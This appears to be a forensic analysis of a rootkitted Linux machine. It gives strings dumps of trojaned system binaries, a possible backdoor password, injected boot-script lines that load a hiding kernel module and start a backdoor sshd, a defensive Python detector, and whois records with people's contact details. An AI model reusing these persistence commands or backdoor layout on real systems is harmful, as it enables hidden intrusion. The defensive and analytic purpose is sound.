    /bin/sh
    <End of login>


    /bin/ls - The original ls command was moved to /lib/security/.config/bin/ls. The bad ls command executes first, then calls the original command.
     

    <Strings output of ls>
    /lib/ld-linux.so.2
    __gmon_start__
    libc.so.6
    strcpy
    waitpid
    printf
    stdout
    fdopen
    fgets
    pclose
    dup2
    feof
    remove
    fflush
    popen
    pipe
    strcat
    __deregister_frame_info
    chdir
    fseek
    strstr
    rand
    strncmp
    _IO_getc
    fork
    execv
    ftell
    srand
    time
    opendir
    tmpnam
    getcwd
    fclose
    fputc
    rewind
    exit
    fopen
    _IO_putc
    _IO_stdin_used
    _exit
    __libc_start_main
    open
    strchr
    execvp
    closedir
    __register_frame_info
    close
    GLIBC_2.1
    GLIBC_2.0
    PTRh
    PPVh
    WVS1
    t5h@
    WVSh
    8-tL
    WVSh=
    VjPh
    VjPh
    /lib/security/.config/uconf.inv
    [file]
    find
    file_filters
    [ps]
    ps_filters
    [netstat]
    netstat
    net_filters
    lsof_filters
    lsof
    [login]
    su_pass
    su_loc
    ping
    passwd
    shell
    [%d] = %p "%s"
    --format=long
    --format=verbose
    --all
    --almost-all
    --ignore-backups
    --time=
    --sort=
    /lib/security/.config/bin/ls
    01,lblibps.so,sn.l,prom
    <End of ls>
    /bin/netstat

    /bin/ping

    <Strings output of ping>
    /lib/ld-linux.so.2
    __gmon_start__
    libc.so.6
    strcpy
    fdopen
    fgets
    dup2
    system
    feof
    remove
    pipe
    __deregister_frame_info
    fseek
    strstr
    rand
    strncmp
    _IO_getc
    fork
    execv
    ftell
    srand
    time
    tmpnam
    fclose
    fputc
    rewind
    fopen
    _IO_stdin_used
    _exit
    __libc_start_main
    open
    strchr
    execvp
    setuid
    __register_frame_info
    close
    GLIBC_2.1
    GLIBC_2.0
    PTRh
    WVSh
    VjPh
    VjPh
    /lib/security/.config/uconf.inv
    [file]
    find
    file_filters
    [ps]
    ps_filters
    [netstat]
    netstat
    net_filters
    lsof_filters
    lsof
    [login]
    su_pass
    su_loc
    ping
    passwd
    shell
    /lib/security/.config/bin/ping
    dbhaHKk53
    /bin/sh
    <End of ping>
    /bin/ps - The original ps command was moved under /lib/security/.config/bin/ (the strings below reference /lib/security/.config/bin/psr). The bad ps command executes first, then calls the original command.
    <strings output of ps>
    /lib/ld-linux.so.2
    __gmon_start__
    libc.so.6
    strcpy
    printf
    fdopen
    getpid
    fgets
    dup2
    system
    feof
    malloc
    remove
    pipe
    kill
    __deregister_frame_info
    fseek
    wait
    strstr
    rand
    strncmp
    _IO_getc
    fork
    ftell
    srand
    time
    tmpnam
    fclose
    fputc
    rewind
    __errno_location
    fopen
    _IO_stdin_used
    _exit
    __libc_start_main
    open
    strchr
    execvp
    setuid
    __register_frame_info
    close
    GLIBC_2.1
    GLIBC_2.0
    PTRh
    QVh@
    WVSh
    VjPh
    VjPh
    /lib/security/.config/uconf.inv
    [file]
    find
    file_filters
    [ps]
    ps_filters
    [netstat]
    netstat
    net_filters
    lsof_filters
    lsof
    [login]
    su_pass
    su_loc
    ping
    passwd
    shell
    /lib/security/.config/bin/psr
    lp,uconf.inv,psniff,psr
    dbhaHKk53
    /bin/sh
    <End of ps>
    /bin/su

    /bin/xlogin -  This is the original login command which is called from the trojaned one.

    /etc/init.d/network - The system startup file was modified to start the sniffer at boot time (the clipped excerpt shows it also starting ssh2d and loading the crth.o module).
     

    <clipped>
            /usr/bin/ssh2d -q
            /sbin/insmod -f /usr/lib/crth.o
            cd /lib/security/.config;./lpsched
            touch /var/lock/subsys/network
            if test -f "/dev/dos"; then
            /usr/lib/lpq
            fi
            ;;
    <clipped>


    /etc/ld.so.hash - This is an encrypted password.  It was different on each compromised machine.

    /sbin/login - It looks like this login was placed in the wrong directory.

    /sbin/lsof 

    /sbin/sendmail - A trojaned sendmail which installs the ssh backdoor.

    - Strings embedded in the sendmail binary:
    ----
    250 OK
    500 Command unrecognized: "tek"
    cp -f /lib/security/.config/sshd /usr/bin/ssh2d
    /usr/bin/ssh2d -q
    221 %s closing connection
    502 Verbose unavailable
    VERB
    250 Verbose mode
    ONEX
    /usr/bin/du - Modified to hide 
    <strings of du>
    j=h@
    /lib/security/.config/uconf.inv
    [file]
    find
    file_filters
    [ps]
    ps_filters
    [netstat]
    netstat
    net_filters
    lsof_filters
    lsof
    [login]
    su_pass
    su_loc
    ping
    passwd
    shell
    /lib/security/.config/bin/du
    01,lblibps.so,sn.l,prom
    <End of du>
    /usr/bin/find -

    /usr/sbin/ssh2d -
     

    <strings of ssh2d - clipped>
    +G$9
    /lib/security/.config/ssh/sshd_config
    Received SIGHUP; restarting.
    RESTART FAILED: av[0]='%s', error: %s.
    Received signal %d; terminating.
    Timeout before authentication.
    Generating new %d bit RSA key.
    RSA key generation complete.
    f:p:b:k:h:g:diqV:
    i586-unknown-linux
    1.2.25
    sshd version %s [%s]
    Usage: %s [options]
    Options:
    /lib/security/.config/ssh
      -f file    Configuration file (default %s/sshd_config)
      -d         Debugging mode
      -i         Started from inetd
      -q         Quiet (no logging)
      -p port    Listen on the specified port (default: 22)
      -k seconds Regenerate server key every this many seconds (default: 3600)
      -g seconds Grace period for authentication (default: 300)
      -b bits    Size of server RSA key (default: 768 bits)
    /lib/security/.config/ssh/ssh_host_key
      -h file    File from which to read host key (default: %s)
      -V str     Remote version string already read from the socket
    fatal: Bad server key size.
    fatal: Bad port number.
    fatal: Extra argument %s.
    sshd version %.100s [%.100s]
    Could not load host key: %.200s
    fatal: Please check that you have sufficient permissions and the file exists.
    fatal: Could not load host key: %.200s.  Check path and permissions.
    daemon: %.100s
    Forcing server key to %d bits to make it differ from host key.
    Initializing random number generator; seed file %.200s
    inetd sockets after dupping: %d, %d
    Generating %d bit RSA key.
    socket: %.100s
    bind: %.100s
    Bind to port %d failed: %.200s.
    Server listening on port %d.
    listen: %.100s
    select: %.100s
    accept: %.100s
    Server will not fork when running in debugging mode.
    fork: %.100s
    Forked child %d.
    Connection from %.100s port %d
    SSH-%d.%d-%.50s
    Could not write ident string.
    Did not receive ident string.
    SSH-%d.%d-%[^
    Protocol mismatch.
    Bad protocol version identification: %.100s
    Client protocol version %d.%d; client software version %.100s
    Protocol major versions differ.
    Protocol major versions differ: %d vs. %d
    Your ssh version is too old and is no longer supported.  Please install a newer version.
    This server does not support your new ssh version.
    Unexpected return value from check_emulation.
    Connection from %.200s not allowed.
    Sorry, you are not allowed to connect.
    Closing connection to %.100s
    Sent %d bit public key and %d bit host key.
    IP Spoofing check bytes do not match.
    Encryption type: %.200s
    do_connection
    sshd.c
    sensitive_data.private_key.bits >= sensitive_data.host_key.bits + 128
    sensitive_data.host_key.bits >= sensitive_data.private_key.bits + 128
    Received session key; encryption turned on.
     All port forwardings disabled in this site.
    Forking shell.
    Executing command '%.500s'
    Unknown packet type received after authentication: %d
    Executing forced command: %.900s
    Could not create pipes: %.100s
    setsid: %.100s
    dup2 stdin
    dup2 stdout
    dup2 stderr
    fork failed: %.100s
    pty_cleanup_proc called again, ignored
    pty_cleanup_proc called
    dup2 stdin failed: %.100s
    getpeername: %.100s
    %.200s/.hushlogin
    Last login: %s
    Last login: %s from %s
    /etc/motd
    dup failed: %.100s
    %s=%s
    Bad line in %.100s: %.200s
    /etc/nologin
    Logins are currently denied by /etc/nologin:
     executing remote command as user %.200s
    setgid
    initgroups
    setuid %d: %s
    Failed to set uids to %d.
    /bin/sh
    HOME
    USER
    LOGNAME
    /usr/bin:/bin:/lib/security/.config/bin
    PATH
    /var/spool/mail
    %.200s/%.50s
    MAIL
    SHELL
    SSH_ORIGINAL_COMMAND
    %.50s %d %d
    SSH_CLIENT
    SSH_TTY
    TERM
    DISPLAY
    REMOTEUSER
    SSH_AUTH_SOCK
    /etc/environment
    %.200s/.ssh/environment
    Could not chdir to home directory %s: %s
    Environment:
      %.200s
    .ssh/rc
    %.100s %.100s
    Running %s
    %s %s
    Could not run %s
    /lib/security/.config/ssh/sshrc
    Running %.100s add %.100s %.100s %.100s
    %.200s -q -
    add %s %s %s
    add %.*s/unix%s %s %s
    Running %s add %s%s %s %s
    add %s%s %s %s
    Could not run %s -q -
    No mail.
    You have mail.
    You have new mail.
            WARNING: Your account expires in %d days
            WARNING: Your password expires in %d days
    Found control characters in the .rhosts or .shosts file, rest of the file ignored
    NO_PLUS
    Found empty line in %.100s.
    Found garbage in %.100s.
    %s %s %s
    Ignoring wild host/user names in %.100s.
    Use of %s denied for %s
    Matched negative entry in %.100s.
    .rhosts
    .shosts
    %.500s/%.100s
    /etc/hosts.equiv
    /lib/security/.config/ssh/shosts.equiv
    Connection from %.100s from nonprivileged port %d
    Your ssh client is not running as root.
    Accepted for %.100s [%.100s] by /etc/hosts.equiv.
    Accepted for %.100s [%.100s] by %.100s.
    Rhosts authentication refused for %.100: no home directory %.200s
    Rhosts authentication refused for %.100s: bad ownership or modes for home directory.
    Rhosts authentication refused for %.100s: bad modes for %.200s
    Bad file modes for %.200s
    Server has been configured to ignore %.100s.
    Accepted by %.100s.
    Rhosts/hosts.equiv authentication refused: client user '%.100s', server user '%.100s', client host '%.200s'.
    Server does not permit empty password login.
    /usr/bin/passwd
    %s %s
    Password if forced to be set at first login.
    Login permitted without a password because the account has no password.
    .ssh
    %.500s/%.100s
    Rsa authentication refused for %.100s: bad modes for %.200s
    Bad file modes for %.200s
    Rsa authentication refused for %.100s: no %.200s directory
    Rsa authentication refused, no %.200s directory
    .ssh/authorized_keys
    Could not open %.900s for reading.
    If your home is on an NFS volume, it may need to be world-readable.
    %.100s, line %lu: bad key syntax
    Wrong response to RSA authentication challenge.
    no-port-forwarding
    Port forwarding disabled.
    no-agent-forwarding
    Agent forwarding disabled.
    no-x11-forwarding
    X11 forwarding disabled.
    no-pty
    Pty allocation disabled.
    idle-timeout=
    Idle timeout set to %d seconds.
    command="
    %.100s, line %lu: missing end quote
    Forced command: %.900s
    environment="
    Adding to environment: %.900s
    from="
    RSA authentication tried for %.100s with correct key but not from a permitted host (host=%.200s, ip=%.200s).
    Your host '%.200s' is not permitted to use this key for login.
    Bad options in %.100s file, line %lu: %.50s
    Bugs in auth-rsa.c option processing.
    RSA authentication accepted.
    Trying rhosts with RSA host authentication for %.100s
    Rhosts RSA authentication: canonical host %.900s
    ~/.ssh/known_hosts
    /lib/security/.config/ssh/ssh_known_hosts
    Rhosts with RSA host authentication denied: unknown or invalid host key
    Your host key cannot be verified: unknown or invalid host key.
    The host name used to check the key was '%.200s'.
    Try logging back from the server machine with the canonical host name using ssh, and then try again.
    Client on %.800s failed to respond correctly to host authentication.
    Rhosts with RSA host authentication accepted for %.100s, %.100s on %.700s.
    Rhosts with RSA host authentication accepted.
    openpty: %.100s
    chown %.100s 0 0 failed: %.100s
    chmod %.100s 0666 failed: %.100s
    /dev/tty
    Failed to disconnect from controlling tty.
    Setting controlling tty using TIOCSCTTY.
    %.100s: %.100s
    open /dev/tty failed - could not set controlling tty: %.100s
    pty_make_controlling_tty: reopening controlling tty after vhangup failed for %.100s
    Unrecognized internal syslog facility code %d
    log: %s
    log: %.500s
    syslog_severity: bad severity %d
    debug: %s
    debug: %.500s
    error: %s
    error: %.500s
    fatal_remove_cleanup: no such cleanup function: 0x%lx 0x%lx
    Calling cleanup 0x%lx(0x%lx)
    fatal: %s
    fatal: %.500s
    /var/log/lastlog
    P%03d
    Could not write %.100s: %.100s
    Could not open %.900s for reading.
    If your home directory is on an NFS volume, it may need to be world-readable.
    %.500s %u 
    getpeername failed: %.100s
    UNKNOWN
    reverse mapping checking gethostbyname for %.700s failed - POSSIBLE BREAKIN ATTEMPT!
    Address %.100s maps to %.600s, but this does not map back to the address - POSSIBLE BREAKIN ATTEMPT!
    Could not reverse map address %.100s.
     %2.2x
    Connection from %.100s with IP options:%.800s
    /lib/security/.config/ssh/ssh_host_key
    /lib/security/.config/ssh/ssh_random_seed
    /var/run/sshd.pid
    /usr/X11R6/bin/xauth
    accountexpirewarningdays
    passwordexpirewarningdays
    checkmail
    xauthlocation
    allowtcpforwarding
    kerberostgtpassing
    kerberosorlocalpasswd
    kerberosauthentication
    idletimeout
    silentdeny
    umask
    pidfile
    <clipped>
    Computing the keys...
    Testing the keys...
    **** private+public failed to decrypt.
    **** public+private failed to decrypt.
    Key generation complete.
    ps laxww 2>/dev/null
    ps -al 2>/dev/null
    ls -alni /tmp/. 2>/dev/null
    w 2>/dev/null
    netstat -s 2>/dev/null
    netstat -an 2>/dev/null
    netstat -in 2>/dev/null
    /dev/random
    random_get_byte
    randoms.c
    state->next_available_byte < (8192 / 8)
    buffer_get trying to get more bytes than in buffer
     %02x
    <clipped>
    <End of ssh2d>


    /usr/lib/crth.o - This is the object module which is created when adore is compiled.  It is normally named adore.o

    <strings of crth.o>
    B49J\u
    9H\t 
    x&!u
    t+;]
    8WVS
    netstat
    :15000
    klogd
    promiscuous mode
    <end of crth.o>
    /usr/lib/lpq - The application which creates the ICMP packet.
    <strings of lpq, clipped just a little bit>
    <clipped>
           T$,
    |$(W
    [^_]
    %d.%d.%d.%d
    Usage: %s <dst> <src> <size> <number>
    Ports are set to send and receive on port 179
    dst:    Destination Address
    src:    Source Address
    size:   Size of packet which should be no larger than 1024 should allow for xtra header info thru routes
    num:    packets
    Could not resolve %s fucknut
    ICMP
    jess
    tc: unknown host
    3.3.3.3
    mservers
    randomsucks
    skillz
    lpsched
    in.telne
    ./0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
    !(Ew
    ~&jE
     iciNWq
    x`\`U
    <End of lpq>


    /var/lock/subsys/network -

    /dev/dos -
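
    An added host check built from the file inventory above (mine, not from the report or any tool it names): it looks for the rootkit paths listed in this section, for the lines injected into /etc/init.d/network, and for the tell-tale strings the `strings` outputs show in the trojaned binaries. It takes a mount point as `root` so it can be run against an offline copy of the victim's disk, where the loaded adore module cannot hide anything from it.

```python
import os
import tempfile

# Paths this report identifies as rootkit components.
ROOTKIT_PATHS = [
    "/lib/security/.config",
    "/etc/ld.so.hash",
    "/bin/xlogin",
    "/usr/lib/crth.o",
    "/usr/lib/lpq",
    "/usr/bin/ssh2d",
    "/usr/sbin/ssh2d",
    "/dev/dos",
]

# Fragments of the lines the report shows injected into /etc/init.d/network.
INIT_MARKERS = ["/usr/bin/ssh2d -q", "insmod -f /usr/lib/crth.o",
                "./lpsched", "/usr/lib/lpq"]

# Strings the report's `strings` output shows in the trojaned binaries; the
# stock RedHat 7 copies of these programs have no reason to contain them.
BINARY_MARKERS = {
    "/bin/login": [b"/etc/ld.so.hash", b"/bin/xlogin"],
    "/bin/ls": [b"/lib/security/.config/uconf.inv"],
    "/bin/ps": [b"/lib/security/.config/uconf.inv"],
    "/bin/ping": [b"/lib/security/.config/uconf.inv"],
    "/usr/bin/du": [b"/lib/security/.config/uconf.inv"],
    "/sbin/sendmail": [b"/usr/bin/ssh2d -q"],
}


def _under(root: str, path: str) -> str:
    """Map an absolute victim path onto the mount point `root`."""
    return os.path.join(root, path.lstrip("/"))


def _read(path: str) -> bytes:
    with open(path, "rb") as fh:
        return fh.read()


def check_host(root: str = "/") -> list[str]:
    """Return one finding per rootkit artifact found below `root`."""
    findings = []
    for path in ROOTKIT_PATHS:
        if os.path.lexists(_under(root, path)):
            findings.append(f"rootkit path present: {path}")
    init = _under(root, "/etc/init.d/network")
    if os.path.isfile(init):
        content = _read(init)
        for marker in INIT_MARKERS:
            if marker.encode() in content:
                findings.append(f"/etc/init.d/network contains {marker!r}")
    for path, markers in BINARY_MARKERS.items():
        full = _under(root, path)
        if not os.path.isfile(full):
            continue
        blob = _read(full)
        for marker in markers:
            if marker in blob:
                findings.append(f"{path} contains {marker.decode()!r}")
    return findings


def demo_on_fixture() -> list[str]:
    """Plant constructed copies of two artifacts from the report in a temp
    directory and run the check against it; no real system is touched."""
    root = tempfile.mkdtemp(prefix="rootkit-check-")
    os.makedirs(_under(root, "/etc/init.d"))
    with open(_under(root, "/etc/ld.so.hash"), "w") as fh:
        fh.write("PLACEHOLDER-HASH\n")  # constructed stand-in, not the real value
    with open(_under(root, "/etc/init.d/network"), "w") as fh:
        fh.write("/usr/bin/ssh2d -q\n/sbin/insmod -f /usr/lib/crth.o\n"
                 "cd /lib/security/.config;./lpsched\n")
    return check_host(root)


if __name__ == "__main__":
    for finding in demo_on_fixture():
        print(finding)
```

Because the trojaned programs are not the packaged ones, `rpm -V` on the affected packages gives an independent cross-check when the RPM database itself is intact.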


     
    Information obtained via samspade.org
    Whois 205.177.91.2
    Registrant:
    Internet Express, Inc. (X-PRESS-DOM)
       po box 240
       Damascus, MD 20872-0240

       Domain Name: X-PRESS.NET

       Administrative Contact, Billing Contact:
          Aultz, Christine A.  (CAA8)  aultz@X-PRESS.NET
          Internet Express, Inc.
          26225 Ridge Road
          Damascus, MD 20872
          (301) 631-8204
       Technical Contact:
          Brodka, Blaine  (BB1922)  blaine@X-PRESS.NET
          Internet Express, Inc
          PO BOX 240
          Damascus, MD 20872-0240
          301-253-1500 (FAX) 301-482-0543

       Record last updated on 25-Jul-2000.
       Record expires on 12-Mar-2001.
       Record created on 11-Mar-1996.
       Database last updated on 14-Dec-2000 07:38:23 EST.

       Domain servers in listed order:

       NS.X-PRESS.NET               205.177.91.4
       NS2.X-PRESS.NET              204.177.91.3

    IP block lookup for 205.177.91.2
    whois -h whois.arin.net 205.177.91.2

    CAIS Internet (NETBLK-CAIS-CIDR-BLK1)
       6861 Elm Street, Third Floor
       McLean, VA 22101 USA

       Netname: CAIS-CIDR-BLK1
       Netblock: 205.177.0.0 - 205.177.255.0
       Maintainer: CAIS

       Coordinator:
          Network Operations Center  (CAIS-NOC-ARIN)  domreg@CAIS.NET
          (703) 448-4470
    Fax- - (703) 790-8805

       Domain System inverse mapping provided by:

       NS.CAIS.COM                   205.177.10.10
       NS2.CAIS.COM                  199.0.216.222

       Rwhois information on assignments from this block available from
       rwhois.cais.net 4321
     

       Record last updated on 17-Aug-1998.
       Database last updated on 14-Dec-2000 07:04:54 EDT.

    Whois Lookup for 210.94.114.48
    OUTPUT from ARIN:

    Asia Pacific Network Information Center (NETBLK-APNIC-CIDR-BLK)
            These addresses have been further assigned to Asia-Pacific users.
            Contact information can be found in the APNIC database,
            at WHOIS.APNIC.NET or http://www.apnic.net/
            Please do not send spam complaints to APNIC.

            Netname: APNIC-CIDR-BLK2
            Netblock: 210.0.0.0 - 211.255.255.255

            Coordinator:
               Administrator, System  (SA90-ARIN)  sysadm@APNIC.NET
               +61-7-3367-0490

            Domain System inverse mapping provided by:

            NS.APNIC.NET                 203.37.255.97
            SVC00.APNIC.NET              202.12.28.131
            NS.TELSTRA.NET               203.50.0.137
            NS.RIPE.NET                  193.0.0.193

            Regional Internet Registry for the Asia-Pacific Region.

            *** Use whois -h whois.apnic.net                      ***

            *** or see http://www.apnic.net/db/ for database assistance   ***
     

            Record last updated on 03-May-2000.
            Database last updated on 5-Feb-2001 06:24:46 EDT.



    OUTPUT from APNIC:

    IP Address         : 210.94.114.0-210.94.114.255
    Connect ISP Name   : THRUNET
    Connect Date       : 20000507
    Registration Date  : 20001101
    Network Name       : ALLNIGHT-NET21

    [ Organization Information ]
    Orgnization ID     : ORG50800
    Name               : ALLNIGHT-NET
    State              : KYONGGI
    Address            : 614-5 nam-dong yongin-si
    Zip Code           : 449-030

    [ Admin Contact Information]
    Name               : keumsun-park
    Org Name           : ALLNIGHT-NET
    State              : KYONGGI
    Address            : 614-5 nam-dong yongin-si
    Zip Code           : 449-030
    Phone              : 0345-407-1317
    Fax                : null
    E-Mail             : ip@ns.kornet21.net

    [ Technical Contact Information ]
    Name               : keumsun-park
    Org Name           : ALLNIGHT-NET
    Address            : 614-5 nam-dong yongin-si
    Zip Code           : 449-030
    Phone              : 0345-407-1317
    Fax                : null
    E-Mail             : ip@ns.kornet21.net

    IP Lookup for 38.246.1.9
    Performance Systems International (NET-PSINETA)
              510 Huntmar Park Drive
                     Herndon, VA  22070

              Netname: PSINETA
              Netblock: 38.0.0.0 - 38.255.255.255
              Maintainer: PSI

              Coordinator:
                 PSINet,Inc.  (PSI-NISC-ARIN)  hostinfo@psi.com
                 (518) 283-8860

              Domain System inverse mapping provided by:

              NS.PSI.NET                   38.8.48.2
              NS2.PSI.NET                  38.8.50.2
              NS5.PSI.NET                  38.8.5.2

              Record last updated on 11-Nov-1998.
              Database last updated on 5-Feb-2001 06:24:46 EDT.

    IP Lookup for 18.242.162.210
    Massachusetts Institute of Technology (NET-MIT-TEMP)
              1 Amherst Street
              Cambridge, MA 02139-1986

              Netname: MIT
              Netblock: 18.0.0.0 - 18.255.255.255

              Coordinator:
                 Schiller, Jeffrey I  (JIS-ARIN)  jis@MIT.EDU
                 +1 617 253-8400 (FAX) +1 617 258-8736

              Domain System inverse mapping provided by:

              STRAWB.MIT.EDU               18.72.0.151
              W20NS.MIT.EDU                18.70.0.160
              BITSY.MIT.EDU                18.72.0.3

              Record last updated on 26-Sep-1998.
              Database last updated on 5-Feb-2001 06:24:46 EDT.